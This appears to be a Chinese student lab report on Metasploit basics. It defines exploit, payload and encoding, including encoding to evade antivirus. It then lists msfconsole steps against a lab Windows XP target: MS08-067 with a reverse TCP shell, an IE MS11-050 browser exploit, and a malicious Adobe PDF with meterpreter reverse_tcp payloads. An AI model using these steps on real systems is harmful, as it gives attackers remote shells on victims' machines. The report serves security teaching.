• 20145225唐振遠《网络对抗》Exp5 MSF基础应用


     

     

    基础问题回答

    1. 用自己的话解释什么是exploit,payload,encode
      • exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中,我觉得老师上课举的火箭和卫星的例子非常形象,火箭只是运载工具,它把卫星送入轨道就完成了它的任务,exploit的功能就和火箭差不多。
      • payload也就相当于载荷,实际上就是之前我们实验中做到的shellcodeexploit把它传送到靶机中后,它就负责执行相应的攻击代码。
      • encode也就是编码,它主要是为了避免之前的payload中出现坏字符,从而影响payload的功能,其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

    实践过程记录

    MS08_067漏洞渗透攻击(主动攻击)

    • 使用winXPenSP3为靶机;
    • 首先得确保两台机子在同一网段内
    • 终端中打开msfconsole,输入命令use exploit/windows/smb/ms08_067_netapi,使用MS08_067漏洞模块;
    • 使用命令set payload generic/shell_reverse_tcp指定攻击有效载荷;
    • 设置具体参数:set LHOST Kali的IPset RHOST Windows的IP
    • show options查看所有参数是否设置正确,最后下令发起攻击exploit:

     

    MS11050安全漏洞(IE浏览器渗透攻击)

    • 终端中打开msfconsole,输入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用MS11050漏洞模块;
    • 使用命令set payload windows/meterpreter/reverse_tcp指定攻击有效载荷;
    • 设置具体参数:set LHOST Kali的IPset LPORT 自定义端口号set URIPATH 自定义域名
    • show options查看所有参数是否设置正确,最后下令发起攻击exploit:

    Adobe阅读器渗透攻击(针对客户端)

    • 终端中打开msfconsole,输入命令use exploit/windows/fileformat/adobe_cooltype_sing,使用Adobe阅读器漏洞模块;
    • 使用命令set payload windows/meterpreter/reverse_tcp指定攻击有效载荷;
    • 设置具体参数:set FILENAME 自定义文件名.pdfset LHOST Kali的IPset LPORT 自定义端口号
    • show options查看所有参数是否设置正确,最后输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里;

    辅助模块的应用:scanner/http/dir_listing

    通过上面三个实验不难看出msf的使用还是有套路可循的:进入模块->指定荷载->设置参数->发动攻击

  • 相关阅读:
    External Interrupts in the x86 system. Part 1. Interrupt controller evolution
    虚拟机中断
    内核中断
    交换机三层转发vlanif
    centos 电池
    ironic port + host_id +device id
    arping
    2018-7-29-C#-强转会不会抛出异常
    2018-7-29-C#-强转会不会抛出异常
    2019-2-2-VisualStudio-扩展开发-添加菜单
  • 原文地址:https://www.cnblogs.com/nizaikanwoma/p/6720517.html
Copyright © 2020-2023  润新知